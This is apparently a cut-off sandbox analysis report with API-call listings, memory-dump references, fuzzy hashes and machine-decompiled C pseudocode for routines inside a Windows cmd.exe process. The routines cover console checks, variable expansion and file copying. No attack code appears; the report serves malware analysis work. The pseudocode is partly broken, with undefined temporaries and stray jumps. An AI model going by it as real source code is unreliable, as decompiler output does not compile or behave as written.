                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011E0183
                                    • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011ED6A1), ref: 011E018D
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 011E01B8
                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,00000001), ref: 011E01C7
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011E01D2
                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011E01DB
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                    • String ID:
                                    • API String ID: 513048808-0
                                    • Opcode ID: 306aa1c7617f198a2a300640dd63d2c94be328a6d1716819b0d9c16c7d09af67
                                    • Instruction ID: 44af7ff06a87fcd81453e106437cc6fc443c273649ccdf173e83130d95c542f6
                                    • Opcode Fuzzy Hash: 306aa1c7617f198a2a300640dd63d2c94be328a6d1716819b0d9c16c7d09af67
                                    • Instruction Fuzzy Hash: 6811E333D04A51ABEB29C7ACA90CB7B3AFCE759235F150315F82696084CBB4C980C752
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011E26A7
                                    • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011DC5F8,?,?,?), ref: 011E26B6
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26D2
                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,00000002), ref: 011E26E1
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011E26EC
                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26F5
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                    • String ID:
                                    • API String ID: 513048808-0
                                    • Opcode ID: 06bf5e13bcd1366657ca3b88040df9bdfdde6bdc6688e52f19cc0ce836b5b684
                                    • Instruction ID: 79ae1ad7e29900b8fcc99a4db4bca68fb94ce915f47b133b4d7319d3cc6efc41
                                    • Opcode Fuzzy Hash: 06bf5e13bcd1366657ca3b88040df9bdfdde6bdc6688e52f19cc0ce836b5b684
                                    • Instruction Fuzzy Hash: 3A01F733C14C246B9E3952FCAC6CDBB36DCE6652347210321FC25D24C5DF758C854691
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 57%
                                    			E011DFE10(void* __ebx, void* __edi, void* __eflags) {
                                    				signed int _v8;
                                    				char _v12;
                                    				signed int _v16;
                                    				signed int _v20;
                                    				signed int _t35;
                                    				signed int _t38;
                                    				signed int _t49;
                                    				signed int _t54;
                                    				signed int _t59;
                                    				signed int _t60;
                                    				signed int _t73;
                                    				signed int _t75;
                                    				void* _t78;
                                    				signed int _t79;
                                    				short* _t80;
                                    				signed int _t83;
                                    				void* _t89;
                                    				signed int _t91;
                                    				signed int _t93;
                                    				void* _t95;
                                    				void* _t99;
                                    				signed int _t102;
                                    				signed int _t104;
                                    				signed int _t108;
                                    				signed int _t110;
                                    				signed int _t112;
                                    				void* _t113;
                                    				void* _t116;
                                    				void* _t120;
                                    				void* _t121;
                                    
                                    				_t121 = _t120 - 0x14;
                                    				_push(_t113);
                                    				_t79 = 0x4002;
                                    				_t35 = E011E00B0(0x4002);
                                    				_v8 = _t35;
                                    				_t104 = _t35;
                                    				if(_t35 == 0) {
                                    					memset(0x1203890, 0, 0x4006);
                                    					_t121 = _t121 + 0xc;
                                    					 *0x120b8a4 = 0x1203892;
                                    					__imp__longjmp(0x120b8f8, 0xffffffff);
                                    					goto L37;
                                    				} else {
                                    					_t113 =  *0x120b8a4;
                                    					_t102 = 0x2001;
                                    					_t79 = _t35;
                                    					_t78 = _t113 - _t35;
                                    					while(1) {
                                    						_t2 = _t102 + 0x7fffdffd; // 0x7ffffffe
                                    						if(_t2 == 0) {
                                    							break;
                                    						}
                                    						_t73 =  *(_t78 + _t79) & 0x0000ffff;
                                    						if(_t73 == 0) {
                                    							break;
                                    						} else {
                                    							 *_t79 = _t73;
                                    							_t79 = _t79 + 2;
                                    							_t102 = _t102 - 1;
                                    							if(_t102 != 0) {
                                    								continue;
                                    							} else {
                                    								L37:
                                    								_t80 = _t79 - 2;
                                    							}
                                    						}
                                    						goto L7;
                                    					}
                                    					__eflags = _t102;
                                    					if(_t102 == 0) {
                                    						goto L37;
                                    					}
                                    				}
                                    				L7:
                                    				_t75 = 0;
                                    				 *_t80 = 0;
                                    				_t81 = _t104;
                                    				_v12 = 0;
                                    				_t38 =  *_t104 & 0x0000ffff;
                                    				if(_t38 == 0) {
                                    					L13:
                                    					 *0x120b8a4 = 0x1203892;
                                    					 *_t113 = 0;
                                    					if(_t75 > 0x2001) {
                                    						__eflags = 0;
                                    						 *0x1203892 = 0;
                                    						goto L40;
                                    					} else {
                                    						return E011E0040(_t81);
                                    					}
                                    				} else {
                                    					while(1) {
                                    						_t83 = _t104;
                                    						_t104 = _t104 + 2;
                                    						_v16 = _t83;
                                    						if(_t75 > 0x2001) {
                                    							break;
                                    						}
                                    						if(_t38 == 0x25) {
                                    							_t93 =  *0x1213cc4;
                                    							__eflags = _t93;
                                    							if(__eflags == 0) {
                                    								L19:
                                    								_t81 = E011D8F70(0x120b8f8, _t104, __eflags,  &_v12, 0x25);
                                    								__eflags = _t81;
                                    								if(_t81 == 0) {
                                    									__eflags =  *0x1213cc4;
                                    									_t113 =  *0x120b8a4;
                                    									if( *0x1213cc4 == 0) {
                                    										goto L33;
                                    									} else {
                                    										_t104 = _v16 + (_v12 + 1) * 2;
                                    									}
                                    									goto L11;
                                    								} else {
                                    									goto L20;
                                    								}
                                    							} else {
                                    								_t54 =  *_t104 & 0x0000ffff;
                                    								__eflags = _t54 - 0x25;
                                    								if(_t54 == 0x25) {
                                    									_t29 = _t83 + 4; // 0x4
                                    									_t104 = _t29;
                                    									L33:
                                    									 *_t113 = 0x25;
                                    									_t113 = _t113 + 2;
                                    									_t75 = _t75 + 1;
                                    									goto L24;
                                    								} else {
                                    									__eflags = _t54 - 0x2a;
                                    									if(_t54 == 0x2a) {
                                    										__eflags =  *0x1213cc9;
                                    										if( *0x1213cc9 == 0) {
                                    											goto L18;
                                    										} else {
                                    											_t99 =  *(_t93 + 0x34);
                                    											_t18 = _t83 + 4; // 0x4
                                    											_t104 = _t18;
                                    											__eflags = _t99;
                                    											if(_t99 == 0) {
                                    												goto L11;
                                    											} else {
                                    												_t89 = _t99;
                                    												_v16 = _t89 + 2;
                                    												do {
                                    													_t59 =  *_t89;
                                    													_t89 = _t89 + 2;
                                    													__eflags = _t59;
                                    												} while (_t59 != 0);
                                    												_t91 = _t89 - _v16 >> 1;
                                    												_v20 = _t91;
                                    												__eflags = _t91;
                                    												if(_t91 <= 0) {
                                    													goto L11;
                                    												} else {
                                    													_t60 = _t91 + _t75;
                                    													_v16 = _t60;
                                    													__eflags = _t60 - 0x2000;
                                    													if(_t60 > 0x2000) {
                                    														memcpy(_t113, _t99, 0x2000 - _t75 + 0x2000 - _t75);
                                    														 *0x1207892 = 0;
                                    														E011DC5A2(_t91, 0x234f, 1, 0x1203892);
                                    														goto L41;
                                    													} else {
                                    														E011E1040(_t113, 0x2003 - (_t113 - 0x1203890 >> 1), _t99);
                                    														_t75 = _v16;
                                    														_t113 = _t113 + _v20 * 2;
                                    														 *0x120b8a4 = _t113;
                                    														goto L11;
                                    													}
                                    												}
                                    											}
                                    										}
                                    									} else {
                                    										L18:
                                    										_t81 = E011E1969(0x120b8f8, _t104,  &_v12, L"0123456789", _t93 + 0x3c);
                                    										__eflags = _t81;
                                    										if(__eflags != 0) {
                                    											L20:
                                    											_t108 = _t81;
                                    											_t10 = _t108 + 2; // 0x2
                                    											_t95 = _t10;
                                    											do {
                                    												_t49 =  *_t108;
                                    												_t108 = _t108 + 2;
                                    												__eflags = _t49;
                                    											} while (_t49 != 0);
                                    											_t110 = _t108 - _t95 >> 1;
                                    											_t75 = _t75 + _t110;
                                    											__eflags = _t75 - 0x2001;
                                    											if(_t75 > 0x2001) {
                                    												L40:
                                    												_push(0);
                                    												_push(0x233f);
                                    												E011DC5A2(_t81);
                                    												L41:
                                    												_t82 = _v8;
                                    												E011E0040(_v8);
                                    												__imp__longjmp(0x120b8f8, 0xffffffff);
                                    												asm("int3");
                                    												_push(0);
                                    												_push(8);
                                    												E011DC5A2(_t82);
                                    												__eflags = 0;
                                    												return 0;
                                    											} else {
                                    												_t116 =  *0x120b8a4;
                                    												E011E1040(_t116, 0x2003 - (_t116 - 0x1203890 >> 1), _t81);
                                    												_t113 = _t116 + _t110 * 2;
                                    												_t112 = _v12 + 1;
                                    												__eflags = _t112;
                                    												_t104 = _v16 + _t112 * 2;
                                    												L24:
                                    												 *0x120b8a4 = _t113;
                                    												goto L11;
                                    											}
                                    										} else {
                                    											goto L19;
                                    										}
                                    									}
                                    								}
                                    							}
                                    						} else {
                                    							 *_t113 = _t38;
                                    							_t75 = _t75 + 1;
                                    							_t113 = _t113 + 2;
                                    							 *0x120b8a4 = _t113;
                                    							if(_t38 == 0xa) {
                                    								break;
                                    							} else {
                                    								L11:
                                    								_t38 =  *_t104 & 0x0000ffff;
                                    								if(_t38 != 0) {
                                    									continue;
                                    								} else {
                                    									break;
                                    								}
                                    							}
                                    						}
                                    						goto L43;
                                    					}
                                    					_t81 = _v8;
                                    					goto L13;
                                    				}
                                    				L43:
                                    			}

                                    APIs
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • memset.MSVCRT ref: 011EC954
                                    • longjmp.MSVCRT(0120B8F8,000000FF,00000000,01203892,01203890,?,?,?,?,011DFD5C,?,?,?,011E837D,00000000), ref: 011EC96D
                                    • memcpy.MSVCRT ref: 011EC987
                                    • longjmp.MSVCRT(0120B8F8,000000FF,01203892,01203890,?,?,?,?,011DFD5C,?,?,?,011E837D,00000000), ref: 011EC9D3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Heaplongjmp$AllocProcessmemcpymemset
                                    • String ID: 0123456789
                                    • API String ID: 2034586978-2793719750
                                    • Opcode ID: ab58ff94ca7811257a50575d93aba93322aad1c91b3e3ba362e65e5a85b342b9
                                    • Instruction ID: 892ae28ae374b134047c022107edaa056674a4bc3f41c6ec0e2555b9fa4dbe0b
                                    • Opcode Fuzzy Hash: ab58ff94ca7811257a50575d93aba93322aad1c91b3e3ba362e65e5a85b342b9
                                    • Instruction Fuzzy Hash: 69712635B002179FEB2DDA6CD84C76A7BE1EF84704F194169D906AB386EB709B43C781
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 77%
                                    			E011E6390(void* __ecx, long __edx) {
                                    				intOrPtr _v8;
                                    				signed int _v16;
                                    				long _v28;
                                    				char _v32;
                                    				void* _v36;
                                    				void _v556;
                                    				signed int _v560;
                                    				signed short* _v564;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* __ebp;
                                    				signed int _t35;
                                    				intOrPtr _t47;
                                    				void* _t54;
                                    				void* _t61;
                                    				signed int _t64;
                                    				signed int _t68;
                                    				signed int _t69;
                                    				signed int _t71;
                                    				signed int _t78;
                                    				signed int _t83;
                                    				signed short* _t92;
                                    				void* _t97;
                                    				signed int _t100;
                                    				intOrPtr _t102;
                                    				void* _t103;
                                    				signed int _t104;
                                    				signed short* _t106;
                                    				int _t108;
                                    				void* _t109;
                                    				signed int _t110;
                                    				signed int _t115;
                                    
                                    				_t95 = __edx;
                                    				_t71 = _t115;
                                    				_push(__ecx);
                                    				_push(__ecx);
                                    				_v8 =  *((intOrPtr*)(_t71 + 4));
                                    				_t113 = (_t115 & 0xfffffff8) + 4;
                                    				_t35 =  *0x11fd0b4; // 0x2833377e
                                    				_v16 = _t35 ^ (_t115 & 0xfffffff8) + 0x00000004;
                                    				_t102 =  *((intOrPtr*)(_t71 + 8));
                                    				_t108 = 0;
                                    				_v28 = 0x104;
                                    				_v36 = 0;
                                    				_v32 = 1;
                                    				memset( &_v556, 0, 0x104);
                                    				if(E011E0C70( &_v556, ((0 | _v32 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
                                    					_t47 = 1;
                                    					L32:
                                    					_t108 = _t47;
                                    					L10:
                                    					__imp__??_V@YAXPAX@Z(_v36);
                                    					_pop(_t103);
                                    					_pop(_t109);
                                    					return E011E6FD0(_t108, _t71, _v16 ^ _t113, _t95, _t103, _t109);
                                    				}
                                    				_t104 = E011DEA40( *((intOrPtr*)(_t102 + 0x3c)), 0x11d24ac, (0 |  *0x1213cc9 != 0x00000000) + 2);
                                    				_v560 = _t104;
                                    				if( *0x1213cc9 == 0) {
                                    					L4:
                                    					_t78 = _t104;
                                    					_t17 = _t78 + 2; // 0x2
                                    					_t97 = _t17;
                                    					do {
                                    						_t54 =  *_t78;
                                    						_t78 = _t78 + 2;
                                    					} while (_t54 != _t108);
                                    					_v560 = _t78 - _t97 >> 1;
                                    					E011E1040(_t104, _v560 + 1, E011E22C0(_t71, _t104));
                                    					_t95 =  *_t104 & 0x0000ffff;
                                    					if(_t95 != 0) {
                                    						_t83 = _t104;
                                    						_t26 = _t83 + 2; // 0x2
                                    						_v560 = _t26;
                                    						do {
                                    							_t58 =  *_t83;
                                    							_t83 = _t83 + 2;
                                    						} while (_t58 != _t108);
                                    						if(_t83 - _v560 >> 1 != 2 ||  *((short*)(_t104 + 2)) != 0x3a || iswalpha(_t95) == 0) {
                                    							_t47 = E011F8371(_t58, _t104);
                                    							 *0x120b8b0 = _t47;
                                    							goto L32;
                                    						} else {
                                    							_t88 = _v36;
                                    							if(_v36 == 0) {
                                    								_t88 =  &_v556;
                                    							}
                                    							_t95 = _v28;
                                    							E011E36CB(_t71, _t88, _v28,  *_t104 & 0x0000ffff);
                                    							_t61 = _v36;
                                    							if(_t61 == 0) {
                                    								_t61 =  &_v556;
                                    							}
                                    							L9:
                                    							_push(_t61);
                                    							E011E25D9(L"%s\r\n");
                                    							 *0x120b8b0 = _t108;
                                    							goto L10;
                                    						}
                                    					}
                                    					_t91 =  *0x1213cb8;
                                    					if( *0x1213cb8 == 0) {
                                    						_t91 = 0x1213ab0;
                                    					}
                                    					_t95 =  *0x1213cc0;
                                    					E011E36CB(_t71, _t91,  *0x1213cc0, _t108);
                                    					_t61 =  *0x1213cb8;
                                    					if(_t61 == 0) {
                                    						_t61 = 0x1213ab0;
                                    					}
                                    					goto L9;
                                    				}
                                    				_t64 =  *_t104 & 0x0000ffff;
                                    				_t92 = _t104;
                                    				_t110 = _t104;
                                    				if(_t64 != 0) {
                                    					_t100 = _t64;
                                    					do {
                                    						 *_t110 = _t100;
                                    						if(_t100 == 0) {
                                    							L17:
                                    							_v564 =  &(_t92[1]);
                                    							while(1) {
                                    								_t23 = _t110 - 2; // -4
                                    								_t106 = _t23;
                                    								if(iswspace( *_t106 & 0x0000ffff) == 0) {
                                    									goto L20;
                                    								}
                                    								_t110 = _t106;
                                    							}
                                    							goto L20;
                                    						} else {
                                    							goto L16;
                                    						}
                                    						do {
                                    							L16:
                                    							_t92 =  &(_t92[1]);
                                    							_t110 = _t110 + 2;
                                    							_t69 =  *_t92 & 0x0000ffff;
                                    							 *_t110 = _t69;
                                    						} while (_t69 != 0);
                                    						goto L17;
                                    						L20:
                                    						_t92 = _v564;
                                    						 *_t110 = 0;
                                    						_t110 = _t110 + 2;
                                    						_t68 =  *_t92 & 0x0000ffff;
                                    						_t100 = _t68;
                                    					} while (_t68 != 0);
                                    					_t104 = _v560;
                                    				}
                                    				 *_t110 = 0;
                                    				_t108 = 0;
                                    				goto L4;
                                    			}

                                    APIs
                                    • memset.MSVCRT ref: 011E63D6
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEAB7
                                      • Part of subcall function 011DEA40: iswspace.MSVCRT ref: 011DEB2D
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB49
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB6D
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E64BF
                                    • iswspace.MSVCRT ref: 011EF751
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: wcschr$iswspacememset
                                    • String ID: %s
                                    • API String ID: 2220997661-3043279178
                                    • Opcode ID: 3111916c693a68d54360fa4a4b35737f4677efdd8e221b84e2c2d39982f27fc9
                                    • Instruction ID: 7390d7a9f5fcb49a626bf0bc735216243d7e8b48e7398698481710cee3615466
                                    • Opcode Fuzzy Hash: 3111916c693a68d54360fa4a4b35737f4677efdd8e221b84e2c2d39982f27fc9
                                    • Instruction Fuzzy Hash: 38512675A009169BDB2CDFA8E8496BBB7F6FF58254F14015DDC05D7240EB308982C791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 78%
                                    			E011F85E9(intOrPtr __ecx, signed int __edx) {
                                    				signed int _v20;
                                    				int _v32;
                                    				char _v36;
                                    				int _v40;
                                    				void _v560;
                                    				int _v568;
                                    				char _v572;
                                    				int _v576;
                                    				void _v1096;
                                    				int _v1104;
                                    				char _v1108;
                                    				int _v1112;
                                    				void* _v1124;
                                    				void _v1632;
                                    				intOrPtr _v1636;
                                    				signed int _v1640;
                                    				int _v1644;
                                    				signed int* _v1648;
                                    				signed int* _v1652;
                                    				signed int _v1656;
                                    				intOrPtr _v1660;
                                    				char _v1664;
                                    				void* _v1668;
                                    				void* _v1672;
                                    				void* _v1676;
                                    				void* _v1680;
                                    				void* _v1684;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t196;
                                    				signed int _t198;
                                    				void* _t218;
                                    				void* _t232;
                                    				signed int _t236;
                                    				void* _t237;
                                    				signed int _t239;
                                    				void* _t240;
                                    				signed int _t241;
                                    				signed int _t242;
                                    				signed int _t244;
                                    				signed int _t252;
                                    				signed int _t253;
                                    				signed int _t255;
                                    				signed char _t258;
                                    				intOrPtr _t260;
                                    				void* _t263;
                                    				signed int _t265;
                                    				signed int _t266;
                                    				signed int _t267;
                                    				signed int _t269;
                                    				signed int _t270;
                                    				signed int _t273;
                                    				signed int _t274;
                                    				signed int _t276;
                                    				signed int _t279;
                                    				void* _t280;
                                    				signed int _t281;
                                    				void* _t282;
                                    				signed int _t290;
                                    				signed int _t291;
                                    				void* _t292;
                                    				signed int _t293;
                                    				signed int _t295;
                                    				void* _t296;
                                    				signed int _t297;
                                    				void* _t298;
                                    				signed int _t299;
                                    				void* _t300;
                                    				void* _t303;
                                    				intOrPtr _t305;
                                    				signed int _t307;
                                    				void* _t316;
                                    				void* _t317;
                                    				signed int _t346;
                                    				void* _t348;
                                    				void* _t352;
                                    				intOrPtr _t354;
                                    				intOrPtr _t356;
                                    				void* _t357;
                                    				WCHAR* _t358;
                                    				signed int _t359;
                                    				signed int _t368;
                                    				intOrPtr _t371;
                                    				signed int _t392;
                                    				signed int _t412;
                                    				void* _t414;
                                    				signed int _t416;
                                    				signed int _t418;
                                    				intOrPtr _t419;
                                    				void* _t420;
                                    				signed int* _t421;
                                    				void* _t422;
                                    				signed int _t426;
                                    				signed int _t428;
                                    				signed int _t431;
                                    				void* _t435;
                                    
                                    				_t391 = __edx;
                                    				_t318 = __ecx;
                                    				_t418 = __edx;
                                    				if(__ecx != 0) {
                                    					_push(0);
                                    					_push(__ecx);
                                    					E011DC108(__ecx);
                                    					_pop(_t318);
                                    				}
                                    				if(_t418 == 1) {
                                    					_t418 = 0x1213d00;
                                    					E011E274C(0x1213d00, 0x104, L"%9d",  *0x11fd56c);
                                    					E011DC108(_t318, 0x2336, 1, 0x1213d00);
                                    					_t426 = _t426 + 0x1c;
                                    				}
                                    				 *0x11fd560 =  *0x1218064 & 0x000000ff;
                                    				while(1) {
                                    					_t196 =  *0x11fd5dc; // 0x0
                                    					_t435 =  *0x11fd568 - _t196; // 0x0
                                    					if(_t435 >= 0) {
                                    						break;
                                    					}
                                    					_t318 =  *((intOrPtr*)( *0x1213cf4 + _t196 * 4 - 4));
                                    					E011DCD27(_t318);
                                    				}
                                    				__imp__longjmp(0x120b8f8, 1);
                                    				asm("int3");
                                    				_t428 = (_t426 & 0xfffffff8) - 0x67c;
                                    				_t198 =  *0x11fd0b4; // 0x2833377e
                                    				_v20 = _t198 ^ _t428;
                                    				_push(_t418);
                                    				_push(_t412);
                                    				_v1640 = _t391;
                                    				_t419 = _t318;
                                    				_v1104 = 0x104;
                                    				_v1644 = 0;
                                    				_t316 = 1;
                                    				_v1112 = 0;
                                    				_t413 = _t412 | 0xffffffff;
                                    				_v1108 = 1;
                                    				memset( &_v1632, 0, 0x104);
                                    				_v36 = 1;
                                    				_v32 = 0x104;
                                    				_v40 = 0;
                                    				memset( &_v560, 0, 0x104);
                                    				_v572 = 1;
                                    				_v568 = 0x104;
                                    				_v576 = 0;
                                    				memset( &_v1096, 0, 0x104);
                                    				_t431 = _t428 + 0x24;
                                    				if(E011E0C70( &_v1632, ((0 | _v1108 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E011E0C70( &_v560, ((0 | _v36 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E011E0C70( &_v1096, ((0 | _v572 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
                                    					L141:
                                    					E011E0DE8(E011E0DE8(E011E0DE8(_t214,  &_v1096),  &_v560),  &_v1632);
                                    					_t218 = _t316;
                                    				} else {
                                    					_t214 = E011D585F(0xfe00,  &_v1648, 0);
                                    					_v1668 = _t214;
                                    					if(_t214 == 0) {
                                    						goto L141;
                                    					} else {
                                    						if( *0x11fd560 == 0) {
                                    							_t232 = _v1648;
                                    							goto L17;
                                    						} else {
                                    							_v1652 = _v1648;
                                    							_t214 = E011D585F(_v1648,  &_v1668, 1);
                                    							_v1652 = _t214;
                                    							if(_t214 != 0) {
                                    								if(_v1648 >= _v1668) {
                                    									_t232 = _v1668;
                                    									L17:
                                    									_v1652 = _t232;
                                    								}
                                    								_t421 =  *(_t419 + 0x20);
                                    								_v1648 = _t421;
                                    								while(1) {
                                    									_t214 = E011DAD44( *_t421);
                                    									if(_t214 != 0) {
                                    										break;
                                    									}
                                    									_t421 = _t421[8];
                                    									_v1648 = _t421;
                                    									if(_t421 != 0) {
                                    										continue;
                                    									} else {
                                    										_t316 = _t214;
                                    										goto L141;
                                    									}
                                    									goto L142;
                                    								}
                                    								_t391 =  *_t421;
                                    								__eflags = 0;
                                    								E011E68BA(E011E6A00,  *_t421, 0x21, 0, _t421[6],  &_v1664);
                                    								while(1) {
                                    									_t421[7] = _t421[7] & 0xffff3fff;
                                    									_t236 = _t421[7];
                                    									__eflags = _t236 & 0x00000004;
                                    									if((_t236 & 0x00000004) != 0) {
                                    										_t307 = _t236 & 0xfffffffb | 0x00000002;
                                    										__eflags = _t307;
                                    										_t421[7] = _t307;
                                    									}
                                    									__eflags =  *0x11fd544;
                                    									if( *0x11fd544 != 0) {
                                    										break;
                                    									}
                                    									_t391 = _v40;
                                    									__eflags = _v40;
                                    									if(_v40 == 0) {
                                    										_t391 =  &_v560;
                                    									}
                                    									_t237 = E011D579C(_t421, _t391, _v32);
                                    									__eflags = _t237 - _t316;
                                    									if(_t237 == _t316) {
                                    										break;
                                    									} else {
                                    										_push(_t421[1]);
                                    										E011E25D9(L"%s\r\n");
                                    										_t239 = _v1112;
                                    										__eflags = _t239;
                                    										if(_t239 == 0) {
                                    											_t239 =  &_v1632;
                                    										}
                                    										_t391 = _v1640;
                                    										_t240 = E011D5226(_t421, _v1640, _t239, _v1104, 0);
                                    										__eflags = _t240 - _t316;
                                    										if(_t240 == _t316) {
                                    											break;
                                    										} else {
                                    											_t392 = _v1112;
                                    											_t241 = _t392;
                                    											__eflags = _t392;
                                    											if(_t392 == 0) {
                                    												_t241 =  &_v1632;
                                    											}
                                    											__eflags =  *_t241;
                                    											if( *_t241 != 0) {
                                    												__eflags = _t392;
                                    												if(_t392 == 0) {
                                    													_t392 =  &_v1632;
                                    												}
                                    												_t244 = E011F8F66(_t421[1], _t392);
                                    												_t346 = _t421[1];
                                    												__eflags = _t244;
                                    												if(_t244 == 0) {
                                    													_t422 = E011D5DB5(_t346, (_t421[7] & 0x00000800) << 0xa, _t346, _t346);
                                    													__eflags = _t422 - 0xffffffff;
                                    													if(_t422 == 0xffffffff) {
                                    														E011DCD27(_v1664);
                                    														L135:
                                    														_t348 = 0x6e;
                                    														E011F985A(_t348);
                                    														L130:
                                    														__eflags = 0;
                                    														E011F85E9(0, _t316);
                                    														L131:
                                    														E011DCD27(_v1664);
                                    														E011DDB92(_t422);
                                    														_t352 = _v1668;
                                    														L129:
                                    														E011DDB92(_t352);
                                    														goto L130;
                                    													}
                                    													_t252 = E011E0178(_t245);
                                    													__eflags = _t252;
                                    													if(_t252 == 0) {
                                    														_t354 = _v1652;
                                    													} else {
                                    														_t354 = 0x80;
                                    														_v1652 = 0x80;
                                    													}
                                    													_t253 = _v1112;
                                    													__eflags = _t253;
                                    													if(_t253 == 0) {
                                    														_t253 =  &_v1632;
                                    													}
                                    													_t415 = _v1648;
                                    													_t255 = E011D5712(_t422, _v1660, _t354,  &_v1656, _v1648, _t413, _t253);
                                    													__eflags =  *0x1213cf0;
                                    													_v1656 = _t255;
                                    													if( *0x1213cf0 != 0) {
                                    														_t356 = _v1664;
                                    														L137:
                                    														E011DCD27(_t356);
                                    														_t357 = _t422;
                                    														L134:
                                    														E011DDB92(_t357);
                                    														goto L135;
                                    													}
                                    													_t358 = _v1112;
                                    													__eflags = _t358;
                                    													if(_t358 == 0) {
                                    														_t358 =  &_v1632;
                                    													}
                                    													_t258 = GetFileAttributesW(_t358);
                                    													_t359 = _v1112;
                                    													__eflags = _t258 & 0x00000002;
                                    													if((_t258 & 0x00000002) != 0) {
                                    														__eflags = _t359;
                                    														if(_t359 == 0) {
                                    															_t359 =  &_v1632;
                                    														}
                                    														_t360 = E011D5DB5(_t359, _t316, _t359, _t359);
                                    														_v1680 = _t360;
                                    														_v1676 = _t360;
                                    													} else {
                                    														__eflags = _t359;
                                    														if(__eflags == 0) {
                                    															_t359 =  &_v1632;
                                    														}
                                    														_t303 = E011D43A0(_t359, __eflags);
                                    														_v1672 = _t303;
                                    														_v1668 = _t303;
                                    														__eflags = _t303 - 0xffffffff;
                                    														if(_t303 == 0xffffffff) {
                                    															L136:
                                    															_t356 = _v1664;
                                    															goto L137;
                                    														}
                                    														__imp___get_osfhandle(_t303);
                                    														SetEndOfFile(_t303);
                                    														_t360 = _v1672;
                                    													}
                                    													__eflags = _t360 - 0xffffffff;
                                    													if(_t360 == 0xffffffff) {
                                    														goto L136;
                                    													}
                                    													__eflags =  *0x11fd5cc;
                                    													if( *0x11fd5cc == 0) {
                                    														L69:
                                    														_t260 = _v1636;
                                    														while(1) {
                                    															__eflags = _t260 - _t316;
                                    															if(_t260 != _t316) {
                                    																goto L84;
                                    															}
                                    															_t291 = _v1112;
                                    															__eflags = _t291;
                                    															if(_t291 == 0) {
